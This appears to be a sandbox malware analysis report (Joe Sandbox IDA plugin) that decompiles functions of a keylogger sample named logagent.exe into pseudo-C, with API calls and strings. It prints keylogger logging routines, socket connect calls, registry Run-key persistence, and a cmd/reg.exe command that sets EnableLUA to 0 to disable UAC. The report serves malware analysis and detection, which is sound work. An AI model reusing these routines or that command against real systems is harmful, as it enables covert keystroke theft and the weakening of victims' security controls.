                                  • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                  • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10547762 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E10547762(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t56;
				void* _t57;

				_t57 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L10555B05();
				_t25 =  &_v36;
				L10555AFF();
				 *0x415338(_t25, _t25, _t24, _t24, 0x415adc,  &_a4, 0x415b00);
				 *0x415348();
				 *0x415348();
				_t56 = malloc( *0x4152e4() + 0x64);
				sprintf(_t56,  *0x415344(_v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff));
				if( *((char*)(_t57 + 0x3c)) != 0) {
					 *0x4152cc(_t56);
				}
				if( *((char*)(_t57 + 0x3d)) != 0) {
					 *0x4152cc(_t56);
					SetEvent( *(_t57 + 0x34));
				}
				 *0x4153e8(_t56);
				return  *0x415348();
			}










                                  0x1054776d
                                  0x10547770
                                  0x1054777f
                                  0x10547788
                                  0x10547791
                                  0x10547795
                                  0x105477a1
                                  0x105477aa
                                  0x105477b3
                                  0x105477cc
                                  0x105477f8
                                  0x10547805
                                  0x1054780b
                                  0x1054780b
                                  0x10547815
                                  0x1054781b
                                  0x10547824
                                  0x10547824
                                  0x1054782b
                                  0x1054783e

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,10546B55), ref: 10547770
                                  • malloc.MSVCRT ref: 105477C6
                                  • sprintf.MSVCRT ref: 105477F8
                                  • SetEvent.KERNEL32(?), ref: 10547824
                                  • ??3@YAXPAX@Z.MSVCRT ref: 1054782B
                                  Strings
                                  • Offline Keylogger Started, xrefs: 10547768
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??3@EventLocalTimemallocsprintf
                                  • String ID: Offline Keylogger Started
                                  • API String ID: 1702058749-4114347211
                                  • Opcode ID: 8fff95bf636d7516be670f0ed96f12c81efc0224525e2ebce3c59039dcac60e1
                                  • Instruction ID: 2ff0743a83b3cac70b7a43ba9b4ba605e1a3aff2a77ae6cc9b37863e2e813e5d
                                  • Opcode Fuzzy Hash: 8fff95bf636d7516be670f0ed96f12c81efc0224525e2ebce3c59039dcac60e1
                                  • Instruction Fuzzy Hash: 5D213376800518EBCB109BD4ED5DDFE7BBCFF98646B04442AF953D20A0EB78A644CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410E53 Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 24%
                                  			E00410E53(void* __eflags, char _a4) {
				char _v20;
				char _v36;
				char _v52;
				void* _t16;
				char* _t18;
				void* _t19;
				void* _t36;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				E00402038(0x41c130);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0040209B(0x41c130,  &_a4);
				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
				_t18 =  &_v20;
				L00414140();
				L00414140();
				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				E00402118(0x41c130, E00410F04);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t19;
			}










                                  0x00410e65
                                  0x00410e72
                                  0x00410e83
                                  0x00410e84
                                  0x00410e85
                                  0x00410e86
                                  0x00410e87
                                  0x00410e9a
                                  0x00410eac
                                  0x00410eb0
                                  0x00410eba
                                  0x00410ec6
                                  0x00410ed0
                                  0x00410ed9
                                  0x00410ee2
                                  0x00410eef
                                  0x00410ef7
                                  0x00410f03

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                    • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                    • Part of subcall function 00402118: CreateThread.KERNEL32 ref: 0040212D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                  • String ID:
                                  • API String ID: 2339118965-0
                                  • Opcode ID: fff12fb4abebd5b5a673ea32bd5a69ad6a431c578152a6b9ce6a84bceea9081e
                                  • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                  • Opcode Fuzzy Hash: fff12fb4abebd5b5a673ea32bd5a69ad6a431c578152a6b9ce6a84bceea9081e
                                  • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412881 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L00413E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L00413EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                  0x0041288d
                                  0x00412896
                                  0x00412897
                                  0x0041289b
                                  0x004128a1
                                  0x004128a3
                                  0x004128a9
                                  0x004128ab
                                  0x004128b5
                                  0x004128ba
                                  0x004128bd
                                  0x004128c3
                                  0x004128cb
                                  0x004128ce
                                  0x004128d9
                                  0x004128df
                                  0x004128e6
                                  0x004128f3
                                  0x004128fc
                                  0x00412909

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                  • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                  • String ID:
                                  • API String ID: 391609400-0
                                  • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                  • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                  • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413B0F Relevance: 10.6, APIs: 7, Instructions: 55windowstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00413B0F() {
				struct tagMSG _v32;
				char _v292;
				int _t15;

				GetModuleFileNameA(0,  &_v292, 0x104);
				 *0x41c204 = E00413BC8();
				0x41c200->cbSize = 0x58;
				 *0x41c208 = 1;
				 *0x41c210 = 0x401;
				 *0x41c214 = ExtractIconA(0,  &_v292, 0);
				lstrcpynA(0x41c218,  *0x41b160, 0x40);
				 *0x41c20c = 7;
				Shell_NotifyIconA(0, 0x41c200);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v32);
				while(1) {
					_t15 = GetMessageA();
					if(_t15 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v32);
				}
				return _t15;
			}






                                  0x00413b29
                                  0x00413b34
                                  0x00413b42
                                  0x00413b4c
                                  0x00413b56
                                  0x00413b68
                                  0x00413b78
                                  0x00413b84
                                  0x00413b8e
                                  0x00413b9a
                                  0x00413b9b
                                  0x00413b9f
                                  0x00413ba0
                                  0x00413ba1
                                  0x00413ba1
                                  0x00413ba5
                                  0x00000000
                                  0x00000000
                                  0x00413bab
                                  0x00413bb5
                                  0x00413bbb
                                  0x00413bbc
                                  0x00413bc0
                                  0x00413bc1
                                  0x00413bc1
                                  0x00413bc7

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00413B29
                                    • Part of subcall function 00413BC8: RegisterClassExA.USER32(00000030), ref: 00413C0E
                                    • Part of subcall function 00413BC8: CreateWindowExA.USER32 ref: 00413C29
                                    • Part of subcall function 00413BC8: GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00413B60
                                  • lstrcpynA.KERNEL32(0041C218,00000040), ref: 00413B78
                                  • Shell_NotifyIconA.SHELL32(00000000,0041C200), ref: 00413B8E
                                  • GetMessageA.USER32 ref: 00413BA1
                                  • TranslateMessage.USER32(?), ref: 00413BAB
                                  • DispatchMessageA.USER32 ref: 00413BB5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 1970332568-0
                                  • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction ID: 0139c5569a5099b89989dc8841d294567b871d20cbef476d366633a748243c7d
                                  • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction Fuzzy Hash: DA1121B2841215BBD7109BD1EC4CEDB3BBCEB49351F008166B615D2051D7B89545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10555557 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E10555557() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				struct HWND__* _t21;
				signed int _t23;

				_t23 = 0xb;
				memset( &(_v68.style), 0, _t23 << 2);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_v68.cbSize = 0x30;
				asm("movsb");
				_v68.lpszClassName =  &_v20;
				_v68.style = 0;
				_v68.lpfnWndProc = 0x413c3f;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 0;
				_v68.lpszMenuName = 0;
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t21 == 0) {
					GetLastError();
					goto L3;
				}
				return _t21;
			}







                                  0x10555563
                                  0x10555567
                                  0x10555571
                                  0x10555572
                                  0x10555573
                                  0x10555574
                                  0x10555579
                                  0x10555580
                                  0x10555581
                                  0x1055558a
                                  0x1055558d
                                  0x10555594
                                  0x10555597
                                  0x1055559a
                                  0x105555a6
                                  0x105555c8
                                  0x00000000
                                  0x105555c8
                                  0x105555b8
                                  0x105555c0
                                  0x105555c2
                                  0x00000000
                                  0x105555c2
                                  0x105555cd

                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 1055559D
                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 105555B8
                                  • GetLastError.KERNEL32(?,00000000), ref: 105555C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$?<A$MsgWindowClass
                                  • API String ID: 2877667751-23946667
                                  • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction ID: b835873859ba017693882fd432f0971052399b0358a068a740610e17758423ec
                                  • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction Fuzzy Hash: D3019AB1C11228AACB11DF91EC08ADFBFB9EF457A4B004026F410A6240D7B0560ACAE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405D50 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 2222684746-1731565019
                                  • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                  • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                  • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B7B9 Relevance: 10.5, APIs: 7, Instructions: 42registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
				long _t15;
				long _t18;
				void* _t21;
				int _t22;
				void* _t28;

				_t15 = RegCreateKeyW(_a4, _a8,  &_a8);
				if(_t15 != 0) {
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
					_t17 = _t15 + _t15 + 2;
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t22 = 0;
					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17);
					RegCloseKey(_a8);
					if(_t18 == 0) {
						_t22 = 1;
					}
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return _t22;
				}
			}








                                  0x0040b7c6
                                  0x0040b7ce
                                  0x0040b81f
                                  0x0040b828
                                  0x0040b7d0
                                  0x0040b7d5
                                  0x0040b7db
                                  0x0040b7e3
                                  0x0040b7ea
                                  0x0040b7f6
                                  0x0040b801
                                  0x0040b809
                                  0x0040b80b
                                  0x0040b80b
                                  0x0040b810
                                  0x0040b81b
                                  0x0040b81b

                                  APIs
                                  • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7D5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B7E3
                                  • RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                  • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28), ref: 0040B801
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 0040B810
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Windows\SysWOW64\logagent.exe,0041BA28,00415A24), ref: 0040B81F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 1037601705-0
                                  • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                  • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                  • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A0E1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040A0E1() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t17;

				_t17 = 0x11;
				memset( &_v88, 0, _t17 << 2);
				_v88.cb = 0x44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}






                                  0x0040a0ed
                                  0x0040a0f1
                                  0x0040a0f6
                                  0x0040a0fd
